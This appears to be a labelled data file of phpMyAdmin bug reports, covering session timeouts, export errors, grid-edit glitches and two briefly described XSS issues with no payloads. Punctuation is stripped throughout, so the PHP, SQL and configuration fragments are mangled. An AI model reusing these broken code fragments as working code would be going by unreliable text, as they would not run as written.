Displaying of fast filters for tables, views, functions, procedures and events should be governed by NavigationTreeDisplayItemFilterMinimum configuration rather than current NavigationTreeDisplayDbFilterMinimum configuration Original URL https sourceforge.net p phpmyadmin bugs 4556 Original author madhuracj Found in version 4.2.0","bug"
"24444","10671","PHP fatal error, undefined function ).
Hi, I was having many problems when trying to access phpMyAdmin from my apache server, running phpMyAdmin the file index.php ), I saw the following message in the command browser 500 Internal Server Error .
When looking for more information on the Apache error.log, I noticed the following error [Wed October 15 9 59 14 2014] [error] [client 127.0.0.1] PHP Fatal error Call to undefined function ) in C Program Files \ \ Apache Software Foundation \ Apache2..2 \ htdocs \ phpMyAdmin \ \ core.lib.php libraries on line 229 .
It looked like a syntactic mistake, so I opened the file core.lib.php and deleted of the code.
When I restarted the apache service and I tried to access phpMyAdmin again it worked properly.
To verify that the syntactic mistake was not my fault I ve re downloaded the phpMyAdmin 4.2.10 all languages.zip of phpMyAdmin.net but the error is still there.
Software used phpMyAdmin 4.2.10 Apache 2.2.25 PHP 5.3.29 MySQL 5.6 Google Chrome 38.0.2125.101 m Thank you, Aitor.
Original URL https sourceforge.net p phpmyadmin bugs 4557 Original author alanden Found in version 4.2.10","bug"
"24444","10672","Unable to Add Rows while Creating Table.
Once there s error in table creating, it doesn t let add columns.
Here s how you can reproduce this bug.
1.
Go to table creation by clicking on New from left nav bar.
2.
Keep all column name fields empty and hit Enter button.
It should give error 1064 You have an error in your SQL syntax; 3.
Now try adding one more columns from the same page it will give same error again and again until one refreshes the page.
Original URL https sourceforge.net p phpmyadmin bugs 4558 Original author playingdj Found in version 4.2.10","bug"
"24444","10673","PHP error in transformations.
Seen on demo server PHP message PHP Fatal error Call to undefined function PMA Transformation getOptions ) in libraries DisplayResults.class.php on line 2970 Original URL https sourceforge.net p phpmyadmin bugs 4561 Original author nijel Found in version Latest Git","bug"
"24444","10674","Contest 5 Login loop on session expiry.
Steps to reproduce 1.
Go to any import page in server db table mode.
2.
Wait for the session to expire.
set a lower session timeout value temporarily or delete session file) 3.
Select a file to import Or this step may be skipped.
4.
Click Go at the bottom of import page.
5.
You will reach login screen as session had timed out, so Log in.
6.
See an empty red error div as in the screenshot.
7.
Click any other link, you get session timeout popup div.
8.
Login again, stuck in a login loop.
Similar to https sourceforge.net p phpmyadmin bugs 3881 if you can reproduce that.
Original URL https sourceforge.net p phpmyadmin bugs 4276 Original author atul5 Found in version 4.1.6 Attachment http sourceforge.net p phpmyadmin bugs 4276 attachment Screenshot 20from 202014 02 07 2000 3A10 3A15.png","bug"
"24444","10675","Export problems low execution time.
When trying to export about 10 MB database, this error is displayer few seconds after clicking Go and saving file Your export is incomplete, due to a low execution time limit at the PHP level phpMyAdmin has execution time set to 600 10 minutes) AND exported dump is complete so the message isn t true).
Original URL https sourceforge.net p phpmyadmin bugs 4277 Original author azurit Found in version 4.1.6","bug"
"24444","10676","reCaptcha re login requires double effort.
Once logged out, login screen is presented without captcha, trying to re login reloads with login screen with recaptcha, requiring a second login attempt.
Expected function 1 login screen, after a user logout, should assume human, and allow re login without captcha, or, 2 login screen always contains captcha regardless.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 4278 Original author noelb Found in version 4.1.6","bug"
"24444","10677","CTRL up or down moves 2 fields.
Hey guys, if I create a new table I can switch from field to field with STRG up or down on my Keyboard.
If I do this the cursor is moveing 2 fields every time.
Or if I select a value in the dropdown menu for the type of my new column and switch a row down the value is changed to the next and I must edit the field again.
Can anyone reproduce it?
I ve tested it in 4.1.6 and your own master demo.
Thank you in advance Original URL https sourceforge.net p phpmyadmin bugs 4279 Original author dennis1993 Found in version 4.1.8","bug"
"24444","10678","Error Token mismatch.
The Token mismatch error is probably a result of a server side timeout.
No link works and I have to manually edit the browser address to return to pMA home.
Could it pMA redirect me to home itself?
Better yet, could this error be avoided for normal uses)?
Original URL https sourceforge.net p phpmyadmin bugs 4280 Original author olafvdspek Found in version 4.1.7","bug"
"24444","10679","Grid edit enum field, dialog disappears when trying to select value.
It works in Chrome, but in Firefox, when you click on the arrow on the right of the selectbox, the little dialog disappears and you cannot select the value.
It happens in current git, but apparently Git revision abbd6bd from Jan 30 seems to work properly Original URL https sourceforge.net p phpmyadmin bugs 4281 Original author rm km it Found in version Latest Git","bug"
"24444","10680","Query Execution Problem in One Table.
Hi, I have no Idea why the problem happens, When I tried to get rows of a table using query SELECT FROM vwt user product I am getting some error message show below.
> 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near LEFT JOIN`vwa variant specs` ON vwa variant specs.id = vwt user product.model id at line 1 I had checked some queries with Left Join and so.
But I dont know why is it executing right now when some another query is executing?
The problem is occurring in only one table.
None other have the problem.
I had checked down the table structure and foreign keys.
I also tried upgrading the phpmyadmin from 3.5 to 4.1.
But still the problem survives.
I checked in firefox and chrome.
The screenshot of error message is attached with in.
Thanking you in advance Original URL https sourceforge.net p phpmyadmin bugs 4282 Original author euginepj Found in version 4.1.7 Attachment http sourceforge.net p phpmyadmin bugs 4282 attachment errror mysql.png","bug"
"24444","10681","Error message window runs off bottom of screen and can t be scrolled.
Attempting to insert a record with a duplicate value in a field defined as unique caused an error message, which appeared in a red window.
This window was clipped at the bottom of the screen, and I was unable to see the most important part of the message, the MySQL error description.
Clicking the window causes it to disappear and there is no way to scroll it to see the entire message.
Original URL https sourceforge.net p phpmyadmin bugs 4283 Original author roblewis Found in version 4.0.9","bug"
"24444","10682","Reordering a column erases comments for other columns.
Original URL https sourceforge.net p phpmyadmin bugs 4284 Original author lem9 Found in version 4.1.7","bug"
"24444","10683","Open Browse in a new tab.
When browse a empty table by open a new tab, page content is empty, without any message such as MySQL returned an empty result set i.e.
zero rows).
Query took 0.0003 sec) ) For example sql.php?db=performance schema table=events waits history server=1 target= token=9e11c7f660c8c1a2f31fa82ef82751d4 PMAURL 0 sql.php?db=performance schema table=events waits history server=1 target= Original URL https sourceforge.net p phpmyadmin bugs 4286 Original author whalewatching Found in version 4.1.7 Attachment http sourceforge.net p phpmyadmin bugs 4286 attachment shot.png","bug"
"24444","10684","missing trailing slash import and open basedir).
when open basedir is active, phpmyadmin gets the upload dir upload tmp dir or sys temp dir) and create a new filename at this line import.php 383) import file new = tmp subdir .
basename import file) .
uniqid ); It gives an invalid path as sys temp dir never ?)
ends with a slashe.
Similarly, upload tmp dir may end with or without a slashe.
In my case, the resulting path looks like var lib phpmyadmin tmpphpSkVWnh phpmyadmin 4.2.5deb1 Original URL https sourceforge.net p phpmyadmin bugs 4572 Original author bobe Found in version 4.2.10 Attachment http sourceforge.net p phpmyadmin bugs 4572 attachment import trailing slashe.patch","bug"
"24444","10685","Printview Always one column too much.
Hey guys, I have found a bug.
If I click in a table on print the printview has always one column too much.
In Internet Explorer 11 the column is only in the headline and in Firefox complete.
I ve attached two screenshots about it!
Thank you!
Original URL https sourceforge.net p phpmyadmin bugs 4287 Original author dennis1993 Found in version 4.1.7 Attachment http sourceforge.net p phpmyadmin bugs 4287 attachment iexplore.jpg Attachment http sourceforge.net p phpmyadmin bugs 4287 attachment firefox.jpg","bug"
"24444","10686","Expand database icon) after timeout doesn t do anything.
After the login has expired timed out, clicking most links presents the expected red error text linking the user to log in again.
However, clicking the ` ` icon to expand a database or table in the navigation area does not; it turns in to a spinning AJAX processing icon, but never does anything more.
Original URL https sourceforge.net p phpmyadmin bugs 4288 Original author ibennetch Found in version 4.1.7","bug"
"24444","10687","Rename table fatal JavaScript error.
Rename table [A fatal JavaScript error has occurred.]
PMA 4.1.7 OS Windows XP SP3 x32 Soft Apache 2.2.22 Win32) mod ssl 2.2.22 OpenSSL 1.0.1c PHP 5.4.24 Process rename table all ok. Only JavaScript error.
Original URL https sourceforge.net p phpmyadmin bugs 4289 Original author verbum Found in version 4.1.7","bug"
"24444","10688","ShowChgPassword not respected again?).
An old bug seems to be back 2785 The Change password link should not be displayed if cfg[ ShowChgPassword ] is false.
But it is displayed no mather what the options is set .
Original URL https sourceforge.net p phpmyadmin bugs 4290 Original author basd82 Found in version 4.1.7","bug"
"24444","10689","XSS vulnerability in table print view.
With a crafted enum value it is possible to trigger an XSS in table print view page Original URL https sourceforge.net p phpmyadmin bugs 4578 Original author madhuracj Found in version 4.0.0","bug"
"24444","10690","Unable to export comments in OpenDocument text format.
In 4.1.7 but also in 4.0.6 and maybe earlier 4.x versions) it is impossible to export the comments in OpenDocument Text format regardless of the state of the Display comments checkbox.
The problem seems to be that ExportOdtClass.php sets the odt comments option to force inclusion of comments in output, however export.php only checks for include comments , like this do comments = isset GLOBALS[ what .
include comments ]); For me, I solved it this way do comments = isset GLOBALS[ what .
include comments ]) || isset GLOBALS[ what .
comments ]); The same problem may also occur for latex output, which also set the latex comments setting rather than latex include comments .
Original URL https sourceforge.net p phpmyadmin bugs 4291 Original author patakib Found in version 4.1.7","bug"
"24444","10691","Success message and failure message being shown together.
When we do a sql operation resulting in successful operation and then do a non successful operation, both success and failure message stays at the screen.
Method to reproduce go to insert insert data, then in the success form run the same sql statement again and you ll have both messages in there!
I think both messages should be hidden when ever a ajax operation is initiated Original URL https sourceforge.net p phpmyadmin bugs 4292 Original author mebjas Found in version 4.1.7 Attachment http sourceforge.net p phpmyadmin bugs 4292 attachment Untitled.png","bug"
"24444","10692","opening new tab using selflink) for import.php based actions results in error and logout.
Methods to reproduce select a database, select a table > browse inline sql edit > go now in the bottom section click on image to open in new tab it takes to import.php and also subsequently logout the user This will happen with any ajax request involving import.php Original URL https sourceforge.net p phpmyadmin bugs 4293 Original author mebjas Found in version 4.1.7 Attachment http sourceforge.net p phpmyadmin bugs 4293 attachment bugPMA.png","bug"
"24444","10693","Some links in query result doesn t work.
I have encountered some strange errors while using the tool links at the bottom of result query box on master.
I don t know if all of them are related or not, listing together for now.
1.
The `Edit` link does not work.
Sometimes it works, probably the first time in session or page Not sure).
Browse a table.
I used sidebar) Click on `Edit` It goes to edit, as expected) Again select the same table from sidebar.
Click on `Edit`.
This time it does nothing, Even no activity in network log.
2.
The `Explain SQL` link.
Browse a table.
I used sidebar) Click on `Explain SQL`.
It gives error message with no other information.
Network log says that `import.php` returned with the error `success false`).
3.
The `Refresh` link Exactly same as `Explain SQL`) 4.
The `Without PHP Code` link Browse a table.
Go to `Create PHP Code` Click on `Without PHP Code`.
It gives similar error as `Explain SQL` 5.
The `Refresh` link Same as `Explain SQL`) I am using Chrome 38, on Ubuntu 14.04.
Also confirmed on Firefox 33, with PHP 5.5.9 on Apache 2.4.7.
Original URL https sourceforge.net p phpmyadmin bugs 4581 Original author nisargjhaveri Found in version Latest Git","bug"
"24444","10694","Apache proxy failure with auth type config.
This report comes directly from https stackoverflow.com questions 24372485 phpmyadmin authentication issue with apache proxy phpMyAdmin works using Apache proxy if `Authentication type` is set to `http`.
However, it does not work if `Authentication type` is set to `config`.
By not work I mean I get a timeout message.
I have two Apache servers one in a public, internet accessible zone PAZ) and the other in a private restricted zone RZ).
The proxy config is in the PAZ Apache and the phpMyAdmin and MySQL are installed on the RZ server.
This is the proxy setup on the PAZ Apache ProxyPass phpMyAdmin 4.2.2 english https restricted zone server phpMyAdmin 4.2.2 english Original URL https sourceforge.net p phpmyadmin bugs 4583 Original author ibennetch Found in version 4.2.2","bug"
"24444","10695","output as text radio clickable in case of OpenDocument Text in export.
View output as text radio button is still clickable in case of OpenDocument Text format in the export page.
Steps to reproduce 1.
Go to export page and Select output format SQL .
2.
Select View output as text .
3.
Now select output format OpenDocument Text .
Original URL https sourceforge.net p phpmyadmin bugs 4294 Original author omerjerk Found in version 4.1.8","bug"
"24444","10696","Problem when session expires while importing file.
Importing of a large database can takes long enough to reach LoginCookieValidity.
When this happens, phpMyAdmin is stucked on file processing in import status.php here while SESSION[ Import message ][ message ] == null) { usleep 250000); 0.25 sec } As session was already expired, this ends in infinite loop.
I suggest 1.)
Prevent session expiration while uploading importing a file better solution).
OR 2.)
Check if session wasn t expired inside that loop and logout a user.
Original URL https sourceforge.net p phpmyadmin bugs 4295 Original author azurit Found in version 4.1.8","bug"
"24444","10697","DROP DATABASE tick box in export no longer works.
Since version 4 or possibly 4.1) doing an export with the Add DROP DATABASE statement box ticked no longer includes the DROP DATABASE `databasename`; in the exported file.
The problem can be easily rectified by adding the apparently missing entry sql drop database to the post params array in export.php.
Original URL https sourceforge.net p phpmyadmin bugs 4297 Original author davidviner Found in version 4.1.8","bug"
"24444","10698","Missing validation on Import CSV Columns enclosed with and Columns escaped with .
For Import in csv fromat Columns enclosed with and Columns escaped with should not let enter more than one character as Mysql supports char value only for these field.
Within PMA, it ll also save an error on form submit to user.
Original URL https sourceforge.net p phpmyadmin bugs 4298 Original author smita786 Found in version 4.1.8","bug"
"24444","10699","Deletion even when the user says No to the confirmation message.
After searching in a database when user clicks on delete of a result a confirmation message pops up.
When the user clicks on No button, the results are deleted.
1. click on a database 2. click on search tab 3. search for an entry 4. click on delete 5. click on No when confirmation dialog appears In addition to that, the behavior of that feature is different to the expected behavior of the code.
Original URL https sourceforge.net p phpmyadmin bugs 4299 Original author plbsam Found in version 4.1.8","bug"
"24444","10700","Can not add new procedures.
Adding a procedure with latest gives an error while doing so with the same parameters in QA 4 2 works.
Looks like it s related to the delimiter Original URL https sourceforge.net p phpmyadmin bugs 4589 Original author madhuracj Found in version Latest Git","bug"
"24444","10701","Browse Foreign Values not working.
The Browse Foreign Values option is not working again.
Same problem of 3956. phpMyAdmin 4.2.11 Apache 2.4.10 PHP 5.5.19 Firefox 33.1 Original URL https sourceforge.net p phpmyadmin bugs 4590 Original author vicbenincasa Found in version 4.2.11","bug"
"24444","10702","Some params are being omitted from microhistory.
1.
Go to Table s export page.
2.
Press Refresh in the browser The sql output format will be gone and pressing go at this moment will generate a PHP error.
Another instance Select a table => Go to privileges => and refresh Original URL https sourceforge.net p phpmyadmin bugs 4302 Original author omerjerk Found in version Latest Git","bug"
"24444","10703","Editing columns tbl structure.php) is incredibly slow.
Whenever I try to edit a column definition of a table, it takes a really long time for the form to appear.
It s taking approximately 10 seconds per field edited in other words if I click edit next to one field it s about 10 seconds, but if I tick 4 fields and click edit below the list, it takes 40 seconds!!
I ve checked using the network tab in Chrome Dev Tools and the time is all spent waiting on the tbl structure.php request, so I assume it s an issue with the PHP script and not JavaScript).
Has been happening for a few versions now.
Just updated to 4.2.11 and it s still occurring.
Original URL https sourceforge.net p phpmyadmin bugs 4592 Original author svivian Found in version 4.2.11","bug"
"24444","10704","New link in navi panel is shown even if no privileges.
A user having no privileges to create a database should not see New at the database level.
Original URL https sourceforge.net p phpmyadmin bugs 4303 Original author lem9 Found in version 4.1.9","bug"
"24444","10705","DB export using zip compression generates an empty archive.
1.
Go to DB export page Choose Custom export method Choose Zipped compression Run the export with the Go button Open the zip file it s empty.
Original URL https sourceforge.net p phpmyadmin bugs 4304 Original author tithugues Found in version Latest Git","bug"
"24444","10706","XSS in multi submit.
With crafted database, table or column name it is possible to trigger an XSS when deleting multiple rows from a table Original URL https sourceforge.net p phpmyadmin bugs 4598 Original author madhuracj Found in version 4.0.0","bug"
"24444","10707","JS error when editing procedure from nav panel.
Steps to reproduce 1.
Click on the icon next to the procedure in the nav panel.
2.
Editor dialog for the procedure will appear.
3.
Now click the GO button.
Original URL https sourceforge.net p phpmyadmin bugs 4305 Original author omerjerk Found in version Latest Git","bug"
"24444","10708","Warning when editing the results of a Search.
The table Search form should not be locking the page; otherwise the user gets the You have unsaved changes; are you sure you want to leave this page?
message when trying to edit from the search results.
Original URL https sourceforge.net p phpmyadmin bugs 4600 Original author lem9 Found in version Latest Git","bug"
"24444","10709","Breadcrumb bar inconsistent with content being shown.
After creating saving a new table with the GUI helper, the content page shows a listing of the tables in the respective database, while showing as viewing the current table structure in the breadcrumb bar.
Original URL https sourceforge.net p phpmyadmin bugs 4306 Original author erutan409 Found in version 4.1.8","bug"
"24444","10710","Nav Columns won t expand with specific schema.
Expanding the database and table in the navigation pane normally shows Columns and Indexes where there is an index).
Using the following table schema, the plus sign to expand Columns isn t shown.
<pre> CREATE TABLE IF NOT EXISTS `events` `eID` int 11) NOT NULL, `ePerformer` int 11) NOT NULL, `eGenre` int 11) NOT NULL, `eVenue` int 11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; < pre> I have no idea why this might be the case.
Original URL https sourceforge.net p phpmyadmin bugs 4307 Original author ibennetch Found in version Latest Git","bug"
"24444","10711","Edit routine form submitting when pressing enter.
Steps to reproduce 1.
Go to Routines tab.
2.
Execute a routine.
3.
Edit the routine so that edit dialog box will appear.
4.
Inside the Definition of procedure if you press enter the form is automatically submitted.
Original URL https sourceforge.net p phpmyadmin bugs 4308 Original author omerjerk Found in version 4.1.8","bug"
"24444","10712","Cannot create edit events and procedures.
phpMyAdmin is printing message like You do not have the necessary privileges to create an event .
Permissions privileges are, of course, correct.
Original URL https sourceforge.net p phpmyadmin bugs 4309 Original author azurit Found in version 4.1.8","bug"
"24444","10713","Unseen messages in tracking.
Some messages are not seen, for example when we activate or deactivate tracking for a table, or when we delete an entry from a tracking report.
Original URL https sourceforge.net p phpmyadmin bugs 4605 Original author lem9 Found in version 4.2.12","bug"
"24444","10714","Wrong database selected after creating procedure.
Steps to reproduce 1.
Select a database from nav panel.
2.
Expand Procedures from another database and create a new procedure.
In nav panel wrong database is selected whereas the main content is different.
Original URL https sourceforge.net p phpmyadmin bugs 4310 Original author omerjerk Found in version Latest Git","bug"
"24444","10715","Advisor erroneously shows You do not have InnoDB enabled .
In the advisor, You do not have InnoDB enabled is being shown, even though InnoDB is enabled.
Used variable formula have innodb I just upgraded to MySQL 5.6.x.
and I believe have innodb was deprecated removed in 5.6. https github.com magento magento2 pull 258 The above URL says what to use instead.
phpMyAdmin 4.1.8 MySQL 5.6.16 Thanks, Rich Original URL https sourceforge.net p phpmyadmin bugs 4311 Original author awhig Found in version Latest Git","bug"
"24444","10716","Moving chart causes javascript error.
See summary This report is related to user submitted report [ 9] http reports.phpmyadmin.net reports view 9) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4312 Original author mohamed ashraf Found in version Latest Git","bug"
"24444","10717","GIS Visualization Extension does not work with PointFromText ) function.
I have changed my table structure to use proper GIS extensions due to this bug.
So, I am not able to export my db structure.
The problem is that I had 2 DECIMAL columns geo lat, geo long) and I was trying to visualize my data using GIS, with the following query <code>SELECT name, PointFromText Concat POINT , geo lat, , geo long, ) ) ) AS coordinates FROM `users` LIMIT 0 , 50< code> It returns results properly and displays them as GEOMETRY ), but when i try to visualize them the map turns out to be empty.
Original URL https sourceforge.net p phpmyadmin bugs 4313 Original author skureta Found in version 3.5.8","bug"
"24444","10718","Grid edit fatal JS error on timestamp fields.
When you try to edit a timestamp field, the datepicker doesn t appear.
See the generated error report here http pastebin.com betBWRXA Original URL https sourceforge.net p phpmyadmin bugs 4315 Original author rm km it Found in version Latest Git","bug"
"24444","10719","SELECT permission issues with relations and restricted access.
I am using MyISAM tables with phpMyAdmin based relations.
All relations are configured that way in that database.
I now have a user account which does not have access to all tables.
When trying to use the search facility, phpMyAdmin tries to resolve all configured relations in order to fill the drop down selection fields.
As the user does not have permission for the linked tables, the database server returns a permisson error and phpMyAdmin aborts .
Using the table search facility simply does not work.
Example I have two tables table1 and table2.
table1.table2 id links to table2.table2 id via phpMyAdmin).
A user has complete SELECT access to table1, but no access to table2 at all.
A user cannot use search facility search tab) for table1.
Original URL https sourceforge.net p phpmyadmin bugs 4608 Original author ci dev Found in version 4.2.10","bug"
"24444","10720","Grid edit can t change month on date fields.
When you try to edit a date field not timestamp, see bug 4315), the datepicker appears, but when you click one of the arrow buttons to change the month, the picker disappears Original URL https sourceforge.net p phpmyadmin bugs 4316 Original author rm km it Found in version Latest Git","bug"
"24444","10721","No visual cue when a table is sorted by multiple columns.
Not really sure if this could be called a feature request.
When I sort a table by a column by clicking on it, I see a arrow on it that tells me that the table is sorted by that column and the direction of the arrow tells me if it is ordered in a ascending or a descending order.
But when I do the same for multiple columns using the query such as select from table name order by column1 asc, column2 desc.
There are no arrows on any columns !
Original URL https sourceforge.net p phpmyadmin bugs 4317 Original author adisas91 Found in version Latest Git","bug"
"24444","10722","Default connection collation and sorting.
With version 4.1.9 the server connection collation seems stuck on utf8mb4 general ci.
Selecting utf8 general ci does not work.
xe2x80xa2Server localhost via TCP IP xe2x80xa2Server type MySQL xe2x80xa2Server version 5.5.20 MySQL Community Server GPL) xe2x80xa2Protocol version 10 xe2x80xa2Server charset UTF 8 Unicode utf8) xe2x80xa2Apache 2.4.7 Win32) PHP 5.3.28 xe2x80xa2Database client version libmysql mysqlnd 5.0.8 dev 20102224 Id 731e5b87ba42146a687c29995d2dfd8b4e40b325 xe2x80xa2PHP extension mysqli browsers IE9, Chrome, Firefox Original URL https sourceforge.net p phpmyadmin bugs 4318 Original author candev Found in version 4.3.4","bug"
"24444","10723","Truncated query while editing table with large amount of columns.
When you try to edit insert modify) a table that have a large amount of columns over 100), the query will result truncated causing an error.
For example, you can t insert a row in this table by using the PhpMyEdit editor page.
The query result truncated to field ee54 CREATE TABLE IF NOT EXISTS `test large amount` `id` int 11) NOT NULL AUTO INCREMENT, `model` varchar 50) DEFAULT NULL, `mask` char 2) DEFAULT NULL, `SOTIC` char 5) DEFAULT NULL, `customer` varchar 20) DEFAULT NULL, `protocol` varchar 20) DEFAULT NULL, `Advanced` tinyint 1) DEFAULT 0 , `chamber` varchar 20) DEFAULT NULL, `maxaddress` int 11) DEFAULT 99 , `old addressmap` tinyint 1) NOT NULL DEFAULT 0 , `stby l` float DEFAULT NULL, `stby h` float DEFAULT NULL, `led l` float DEFAULT NULL, `led h` float DEFAULT NULL, `pw1` int 11) DEFAULT NULL, `pw2` int 11) DEFAULT NULL, `pw3` int 11) DEFAULT NULL, `pw4` int 11) DEFAULT NULL, `pw5` int 11) DEFAULT NULL, `pw6` int 11) DEFAULT NULL, `pw7` int 11) DEFAULT NULL, `pw8` int 11) DEFAULT NULL, `pw9` int 11) DEFAULT NULL, `pw1norm l` int 11) DEFAULT NULL, `pw1norm h` int 11) DEFAULT NULL, `pw2norm l` int 11) DEFAULT NULL, `pw2norm h` int 11) DEFAULT NULL, `pw3norm l` int 11) DEFAULT NULL, `pw3norm h` int 11) DEFAULT NULL, `pw4norm l` int 11) DEFAULT NULL, `pw4norm h` int 11) DEFAULT NULL, `pw4cal th` int 11) DEFAULT NULL, `pw5norm l` int 11) DEFAULT NULL, `pw5norm h` int 11) DEFAULT NULL, `pw6norm l` int 11) DEFAULT NULL, `pw6norm h` int 11) DEFAULT NULL, `pw7norm l` int 11) DEFAULT NULL, `pw7norm h` int 11) DEFAULT NULL, `pw8norm l` int 11) DEFAULT NULL, `pw8norm h` int 11) DEFAULT NULL, `pw9norm l` int 11) DEFAULT NULL, `pw9norm h` int 11) DEFAULT NULL, `pw1alarm l` int 11) DEFAULT NULL, `pw1alarm h` int 11) DEFAULT NULL, `pw2alarm l` int 11) DEFAULT NULL, `pw2alarm h` int 11) DEFAULT NULL, `pw3alarm l` int 11) DEFAULT NULL, `pw3alarm h` int 11) DEFAULT NULL, `pw4alarm l` int 11) DEFAULT NULL, `pw4alarm h` int 11) DEFAULT NULL, `pw5alarm l` int 11) DEFAULT NULL, `pw5alarm h` int 11) DEFAULT NULL, `pw6alarm l` int 11) DEFAULT NULL, `pw6alarm h` int 11) DEFAULT NULL, `pw7alarm l` int 11) DEFAULT NULL, `pw7alarm h` int 11) DEFAULT NULL, `pw8alarm l` int 11) DEFAULT NULL, `pw8alarm h` int 11) DEFAULT NULL, `pw9alarm l` int 11) DEFAULT NULL, `pw9alarm h` int 11) DEFAULT NULL, `pw9iron l` int 11) DEFAULT NULL, `pw9iron h` int 11) DEFAULT NULL, `pw9iroff l` int 11) DEFAULT NULL, `pw9iroff h` int 11) DEFAULT NULL, `pw6th1 l` int 11) DEFAULT NULL, `pw6th1 h` int 11) DEFAULT NULL, `pw6th2 l` int 11) DEFAULT NULL, `pw6th2 h` int 11) DEFAULT NULL, `pw6th3 l` int 11) DEFAULT NULL, `pw6th3 h` int 11) DEFAULT NULL, `pw6th4 l` int 11) DEFAULT NULL, `pw6th4 h` int 11) DEFAULT NULL, `pw6th5 l` int 11) DEFAULT NULL, `pw6th5 h` int 11) DEFAULT NULL, `pw6th6 l` int 11) DEFAULT NULL, `pw6th6 h` int 11) DEFAULT NULL, `pw6th7 l` int 11) DEFAULT NULL, `pw6th7 h` int 11) DEFAULT NULL, `pw6th8 l` int 11) DEFAULT NULL, `pw6th8 h` int 11) DEFAULT NULL, `numbytes` int 11) DEFAULT NULL, `ee0` int 11) DEFAULT NULL, `ee1` int 11) DEFAULT NULL, `ee2` int 11) DEFAULT NULL, `ee3` int 11) DEFAULT NULL, `ee4` int 11) DEFAULT NULL, `ee5` int 11) DEFAULT NULL, `ee6` int 11) DEFAULT NULL, `ee7` int 11) DEFAULT NULL, `ee8` int 11) DEFAULT NULL, `ee9` int 11) DEFAULT NULL, `ee10` int 11) DEFAULT NULL, `ee11` int 11) DEFAULT NULL, `ee12` int 11) DEFAULT NULL, `ee13` int 11) DEFAULT NULL, `ee14` int 11) DEFAULT NULL, `ee15` int 11) DEFAULT NULL, `ee16` int 11) DEFAULT NULL, `ee17` int 11) DEFAULT NULL, `ee18` int 11) DEFAULT NULL, `ee19` int 11) DEFAULT NULL, `ee20` int 11) DEFAULT NULL, `ee21` int 11) DEFAULT NULL, `ee22` int 11) DEFAULT NULL, `ee23` int 11) DEFAULT NULL, `ee24` int 11) DEFAULT NULL, `ee25` int 11) DEFAULT NULL, `ee26` int 11) DEFAULT NULL, `ee27` int 11) DEFAULT NULL, `ee28` int 11) DEFAULT NULL, `ee29` int 11) DEFAULT NULL, `ee30` int 11) DEFAULT NULL, `ee31` int 11) DEFAULT NULL, `ee32` int 11) DEFAULT NULL, `ee33` int 11) DEFAULT NULL, `ee34` int 11) DEFAULT NULL, `ee35` int 11) DEFAULT NULL, `ee36` int 11) DEFAULT NULL, `ee37` int 11) DEFAULT NULL, `ee38` int 11) DEFAULT NULL, `ee39` int 11) DEFAULT NULL, `ee40` int 11) DEFAULT NULL, `ee41` int 11) DEFAULT NULL, `ee42` int 11) DEFAULT NULL, `ee43` int 11) DEFAULT NULL, `ee44` int 11) DEFAULT NULL, `ee45` int 11) DEFAULT NULL, `ee46` int 11) DEFAULT NULL, `ee47` int 11) DEFAULT NULL, `ee48` int 11) DEFAULT NULL, `ee49` int 11) DEFAULT NULL, `ee50` int 11) DEFAULT NULL, `ee51` int 11) DEFAULT NULL, `ee52` int 11) DEFAULT NULL, `ee53` int 11) DEFAULT NULL, `ee54` int 11) DEFAULT NULL, `ee55` int 11) DEFAULT NULL, `ee56` int 11) DEFAULT NULL, `ee57` int 11) DEFAULT NULL, `ee58` int 11) DEFAULT NULL, `ee59` int 11) DEFAULT NULL, `ee60` int 11) DEFAULT NULL, `ee61` int 11) DEFAULT NULL, `ee62` int 11) DEFAULT NULL, `ee63` int 11) DEFAULT NULL, `ee64` int 11) DEFAULT NULL, `ee65` int 11) DEFAULT NULL, `ee66` int 11) DEFAULT NULL, `ee67` int 11) DEFAULT NULL, `ee68` int 11) DEFAULT NULL, `ee69` int 11) DEFAULT NULL, `ee70` int 11) DEFAULT NULL, `ee71` int 11) DEFAULT NULL, `ee72` int 11) DEFAULT NULL, `ee73` int 11) DEFAULT NULL, `ee74` int 11) DEFAULT NULL, `ee75` int 11) DEFAULT NULL, `ee76` int 11) DEFAULT NULL, `ee77` int 11) DEFAULT NULL, `ee78` int 11) DEFAULT NULL, `ee79` int 11) DEFAULT NULL, `ee80` int 11) DEFAULT NULL, `ee81` int 11) DEFAULT NULL, `ee82` int 11) DEFAULT NULL, `ee83` int 11) DEFAULT NULL, `ee84` int 11) DEFAULT NULL, `ee85` int 11) DEFAULT NULL, `ee86` int 11) DEFAULT NULL, `ee87` int 11) DEFAULT NULL, `ee88` int 11) DEFAULT NULL, `ee89` int 11) DEFAULT NULL, `ee90` int 11) DEFAULT NULL, `ee91` int 11) DEFAULT NULL, `ee92` int 11) DEFAULT NULL, `ee93` int 11) DEFAULT NULL, `ee94` int 11) DEFAULT NULL, `ee95` int 11) DEFAULT NULL, `ee96` int 11) DEFAULT NULL, `ee97` int 11) DEFAULT NULL, `ee98` int 11) DEFAULT NULL, `ee99` int 11) DEFAULT NULL, `ee100` int 11) DEFAULT NULL, `ee101` int 11) DEFAULT NULL, `ee102` int 11) DEFAULT NULL, `ee103` int 11) DEFAULT NULL, `ee104` int 11) DEFAULT NULL, `ee105` int 11) DEFAULT NULL, `ee106` int 11) DEFAULT NULL, `ee107` int 11) DEFAULT NULL, `ee108` int 11) DEFAULT NULL, `ee109` int 11) DEFAULT NULL, `ee110` int 11) DEFAULT NULL, `ee111` int 11) DEFAULT NULL, `ee112` int 11) DEFAULT NULL, `ee113` int 11) DEFAULT NULL, `ee114` int 11) DEFAULT NULL, `ee115` int 11) DEFAULT NULL, `ee116` int 11) DEFAULT NULL, `ee117` int 11) DEFAULT NULL, `ee118` int 11) DEFAULT NULL, `ee119` int 11) DEFAULT NULL, `ee120` int 11) DEFAULT NULL, `ee121` int 11) DEFAULT NULL, `ee122` int 11) DEFAULT NULL, `ee123` int 11) DEFAULT NULL, `ee124` int 11) DEFAULT NULL, `ee125` int 11) DEFAULT NULL, `ee126` int 11) DEFAULT NULL, `ee127` int 11) DEFAULT NULL, `lastchange` timestamp NOT NULL DEFAULT CURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=2 ; Original URL https sourceforge.net p phpmyadmin bugs 4319 Original author ranmairs Found in version 4.1.9","bug"
